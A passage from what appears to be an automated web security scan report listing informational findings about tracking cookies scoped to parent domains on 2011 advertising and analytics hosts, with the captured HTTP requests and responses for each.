\"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1=eJzjkuFYeZZVgFGi83vbOxYFRo2Tz9vfsRgwWoD5XCIc9w6wCjBJbLnw6y2LAoMGgwGDBQNQ9MpnFqCe9Wiir4CiTBLPFv1AEV0xH2T+5L7TKKI77zMDRWfNX4sQBQBNEijP; io_freq_p1="eJzjEua4GiHAKNH5ve0diwGjBZjmEuZY7yrAJLHlwq+3LAoMGgwGDBYMQMHjgQLMEuvRBLeFArVP7juNIrjXBSg4a/5ahCAAdLEcdQ=="; 
segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8T8OoJV/tjEJ7H7+DGglUCAcAECUP/o="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:00:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 13:59:53 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:13 GMT; Path=/
Set-Cookie: impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"448473\": [1304949613+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:13 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuGYfYNZgFHi7bP571gUGDV65y94x2LAaAHmc4lwrDzLCpTt/N4GlGXQYDBgsGAAit47wCrAJLHlwq+3yKJXPrMA1a5HE30FFGWSeLboB4roivkgcyf3nUYR3Xkf5JZZ89ciRAEj8S6p"; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:13 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjEuZY4CLAKPH22fx3LAaMFmCaS5jjagRQsPN72zsWBQYNBgMGCwag4HpXASaJLRd+vUUWPB4owCyxHk1wWyhQ++S+0yiCe0EWzZq/FiEIAES0Iic="; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:13 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

9.86. http://tacoda.at.atwola.com/rtx/r.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.js?cmd=AAU:LCN&si=12177&pi=&xs=3&pu=http%253A//www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509%252C0%252C6839926.story%253Fifu%253D&df=1&v=5.5&cb=96391 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305161950|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946; TData=99999|^|51134|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|57094|50961|52841|51182|56419|54032|51186|56988|56673|56148|57362|56969|60203|56835|56987|56780|50220|56768|56299|56761|54057|56681; N=2:d324038c0b1792515a8a9f1affa44cde,d324038c0b1792515a8a9f1affa44cde; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY5ODg6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA=

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:49 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 14:14:49 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 13:59:49 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305161950|60130^1^1305554389|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554389; path=/; expires=Mon, 16-May-11 13:59:49 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304949589^1304951389|12177^1304949589^1304951389; path=/; expires=Mon, 09-May-11 14:29:49 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|57094|54243|50961|54209|52841|51182|56419|56969|56148|57362|60203|56835|56987|56761|56681|50213|56780|56232|50220|56768; expires=Thu, 03-May-12 13:59:49 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:d324038c0b1792515a8a9f1affa44cde,00a1aa9458d8a100f3797a835d7de998; expires=Thu, 03-May-12 13:59:49 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY5Njk6NTYxNDg6NTczNjI6NjAyMDM6NTY4MzU6NTY5ODc6NTY3NjE6NTY2ODE=; expires=Thu, 03-May-12 13:59:49 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Tue, 10-May-11 13:59:49 GMT; domain=tacoda.at.atwola.com
Cteonnt-Length: 321
Content-Type: application/x-javascript
Content-Length: 321

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|57094|54243|50961|54209|
...[SNIP]...

9.87. http://tag.contextweb.com/TagPublish/getad.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=536156&ct=101378&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&mrnd=74482871&if=0&tl=1&pxy=0,0&cxy=1050,3575&dxy=1050,3575&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB23
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2555
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:02 GMT
Connection: close
Set-Cookie: V=wOebwAz4UvVv; domain=.contextweb.com; expires=Wed, 09-May-2012 14:00:02 GMT; path=/
Set-Cookie: 536156_4_101378=1304949602182; domain=.contextweb.com; path=/
Set-Cookie: cr=2|1|-8588966416881931568|1%0a15|1|-8588960524833886248|1; domain=.contextweb.com; expires=Thu, 03-May-2012 14:00:02 GMT; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Tue, 10-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script src="http://tag.admeld.com/passback/js/610/gannett/728x90/8/meld.js"></scr'+'ipt>\n'
;
document.write(strCreative);var strCreative=''
+ '<iframe src="http://bh.context
...[SNIP]...

9.88. http://tags.bluekai.com/site/2731

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2731

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2731 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bko=KJ0qh1q9XWFf3YXwyhNKOGSuZGmIE903zJRLcyweM5Dc4JDRJvWLxRRyxxRssd82FGy1BAYVvjMkpx+C1EWAxk71eaP9cuKUf9evsg1p1myeLyeSHO72; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YRJr9BX7y5mJhasajT/Vx90ZoUfQ==; bklc=4dc7f363; bk=c6b/zCA+ZqtVIHOf; bkc=...[SNIP]...; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101DfI4ByU9WiUOgD=; bkst=KJh5Dn+v96WD7u/QZ1x/kAvyLcHC775ZyY/hgkWCCniSDLALL66QvznrigP4WvpLHHeaH+OYa1PcSI1lVBQ/agqmgANy3LB8z1b59g35HrT572bNYrMKTuADed3eRE3GoDImK7eD/Q3JJxyEbfWKiEyK23u7kzHKO901i9it9/lzddM7j8RvTBSE0CiwHNjTOCwy+ePVVRD8ReqIrceI+XkvDzkV4ek3eMsJ9EHkU9GiZ99Z2sfohLZPTAHimDI6i7ZYWb6GO0Goa09JOPUn8zBi5rnL6gweHyTF/Blof/4qqHsF6TtKUm7poO7xxW1z+jrMRnUhDfN0lCw77DKBrCdTgVTcIlsb8VdvDqycoob1ygPCwh2DnZU+Vu+EQ/ZZPY3lQ3Mh8fZE3tVWuiC+V8wVedCm6AlYfN4cF8KpJHJ9s1WaJ+H2/XjsH0WOjqMHRxuC4gZI5BbpZUXldyJRfc9I; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 14:00:12 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 10 May 2011 14:00:12 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=h3IyWOA+ZqtVIHOf; expires=Sat, 05-Nov-2011 14:00:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=...[SNIP]...; expires=Sat, 05-Nov-2011 14:00:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 10-May-2011 14:00:12 GMT; path=/; domain=.bluekai.com
BK-Server: 9936
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

9.89. http://tags.bluekai.com/site/3358

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3358

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3358?id=wOebwAz4UvVv HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KjjLzXU9Wj/OQG=; bko=KJ0qh1q9XWFf3YXwyhNKOGSuZGmIE903zJRLcyweM5Dc4JDRJvWLxRRyxxRssd82FGy1BAYVvjMkpx+C1EWAxk71eaP9cuKUf9evsg1p1myeLyeSHO72; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YRJr9BX7y5mJhasajT/Vx90ZoUfQ==; bkst=KJh5DeNny69RF3WQtBxvMAJhzeHy7Id5QRmNh3oxuGNtPcgCLCESGuxHjl2OzU/UHHxUxx5HacPtXEzTrni8KGknXSSc8Tw7KSIWf3KHK057eb6uK7HTYiVedZYRePS0a6z2mVGHHzxuCG7NVRdWwG2b6+5vRMXsOAqWOar9HraddF1puyPyb6+kM12Mvl0eY4MSs3rLyCyysl2Km4dfjvVG8irIcEVcZ1x9ZM/rOHa19OBbpf+pzgDXAPQrW3N0AKOWvX3OuLGauWJOgHE0DEAdzUqoNKaMChKxf7xmGottueqGjAIr277SesZG/R7qpPsTNFiolEMF34wmG6R2Y/BV+TmeJBLm+rxGtx5EE64HIgO4evoTKUFK0CHQGiZP036QSFhNbKHSOuWwjVNgLFGCl6tf3UKKgd3G8WLAQeYYY60GI6S1MRTM9LoyGb1R/FNtKItXapwdqFTan/CFAy==; bk=iklbKCA+ZqtVIHOf; bkc=...[SNIP]...

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 14:00:04 GMT
Set-Cookie: bklc=4dc7f364; expires=Wed, 11-May-2011 14:00:04 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 10 May 2011 14:00:04 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=c6b/zCA+ZqtVIHOf; expires=Sat, 05-Nov-2011 14:00:04 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56XLgHcWDOdeFpTpcKeup//DGhoYAEYCLwaRVN6RBYy+oBFq0S+u/uS0GiPnVck1LjZwOjYqI9yrk8OAnhRjRzzfkjIf8nVqhSzfld1b28lzpYMiL9v0w+mUYAY2ewM9XbL8b3xMT4aeyBj2q2O4REd7uQdHpZFwSFAJQKOlGZEbplcY8tYceIEcoNkJof3K5JC5kQcT02tKco3u8UoFp/ld7LSwaxcVBxCX2U0bbqR47/zh8fx6U1BzaEWqu5of2Ni72Sci2xlgB1w4Ud3qpOr/vkT7E4NKBu4Ktuaz6uJXWoYdXH7Tay70I2ig+bTltsU2w6qfnqnXS87g+9Q2yE4LvJNJt7g6yJH6Npc7+GOKTFNW/fV52S8Mg+Hm6FtxuSBpBrMLZp4USNuV6fl3aR7/m5CgRnyW/zflt1KU55JIt57fpfmPSSSfU73e8wrXPtg6orGdv5rOmrL8yW26FolBZox+7oJdcouFnoUAKqRFtXIPVbwcIpLzmBAwRd7fIfvc7lthEumT5d4FSnXllhV7mSIKHefRPWQ8ce14qLFqxIpF5CcOTDqGlvZlFN5cF0idfXlhmXlpSwTTe9eW=; expires=Sat, 05-Nov-2011 14:00:04 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101Df84ByU9WiqOgR=; expires=Sat, 05-Nov-2011 14:00:04 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5Dn+v96WD7u/QZ1x/kAvyLcHC775ZyY/hgkWCCniSDLZLL66QvznrigP4WvpLHHeaH+OYa1PcSI1lVBQ/agqmgG6TNKWXmm5m95N1/FKmEZ8qOUE7X9uvOdlO1OlD6A5clE+3cGUWWGSJ2PiwHOTwK2nEuZ/F9QjsH9HqQWqr4dMN16Lazm+JjRpc/0LXQykTtC3gg1/z1Ord7pFdb22vDzkV4eo3OMsJ9EHkU9GiZ99Z2cqotLZPTodWRo8Ga41WJNoHekHunA9uY33V0y4af1EoCuKcehtKxfgEtxLlt0JKoVL2r5E7uEmQQRRTSM5cyUnMrlgoF14mmTLS5EdyV26m2rB6yNIUGlQcEe6jCuFe4MbGU1gSLNSZ9OBB3PHrOPcMMp17PXL/kPeS+iS+fdm+oJFL4g6Td3tznjW9yQQr1vcrspWtmQGJv1mBei1/24wPC4mKEFtfIx5jnl9d; expires=Sat, 05-Nov-2011 14:00:04 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 10-May-2011 14:00:04 GMT; path=/; domain=.bluekai.com
BK-Server: 3550
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

9.90. http://tap.rubiconproject.com/oz/sensor

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oz/sensor?p=rubicon&pc=8201/13264&cd=false&xt=19&k=shakin'+stevens:144,irish+times:136,n+kane:104,sufjan+stevens:104,siobh+n:104,stevens:74,irish+time:68,computer+screen:64,reflects+order:64,play+reflects:64,stevens+plays:64,war+photographer's:64,s+grid:64,photographer's+world:64,dublin+s:64,harding+s:64,grid+play:64,s+olympia:64,screen+near:64,shop+around:64,car+finance:64,plays+dublin:64,war+photographer:52,stevens+realise:40,health+problems:40,shows+can:40,shakin'+steven:40,can+expect:40,1980s+janet:40,dublin+shows:40,janet+jackson:40,recent+health:40,upcoming+dublin:40,mid+1980s:40,prince+vibe:40,made+sufjan:40,frail+gift:40,tells+siobh:40,problems+made:40,irish:38,&t=Shakin'+Stevens+-+The+Irish+Times+-+Fri,+May+06,+2011 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; xdp_ti="2 May 2011 12:48:41 GMT"; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; dq=25|7|18|0; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; rdk15=0; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; rdk=7856/12590; rdk2=0; ses2=12590^2&13549^1; csi2=3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680

Response

HTTP/1.1 204 No Content
Date: Mon, 09 May 2011 14:07:04 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Tue, 08-May-2012 14:07:04 GMT; Path=/
Set-Cookie: dq=26|7|19|0; Expires=Tue, 08-May-2012 14:07:04 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


9.91. http://trgca.opt.fimserve.com/fp.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trgca.opt.fimserve.com
Path:   /fp.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fp.gif?pixelid=287-036699&diresu=154dab7990adc1d6f3372c12 HTTP/1.1
Host: trgca.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; ssrtb=0; UI="2a8dbca1b98673a117|79973.9.-5.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; LO=00Oj63Jim1.00GK000h0W3NTAEE0; TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 43
Server: PR/1.4.0.0/0.7.61
P3P: policyref="http://www.fimserve.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache, no-store
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Date: Mon, 09 May 2011 14:01:09 GMT
Connection: close
Set-Cookie: TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=; domain=.fimserve.com; path=/; expires= Wednesday, 22-Apr-2020 12:22:20 GMT

GIF89a.............!.......,...........L..;

9.92. http://va.px.invitemedia.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?key=segment&pixelID=57145&partner_uid=&partnerID=115 HTTP/1.1
Host: va.px.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
